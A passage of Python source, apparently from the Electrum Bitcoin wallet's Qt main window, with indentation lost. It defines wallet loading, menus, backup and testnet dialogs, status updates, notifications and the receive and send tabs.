wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Gossip"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
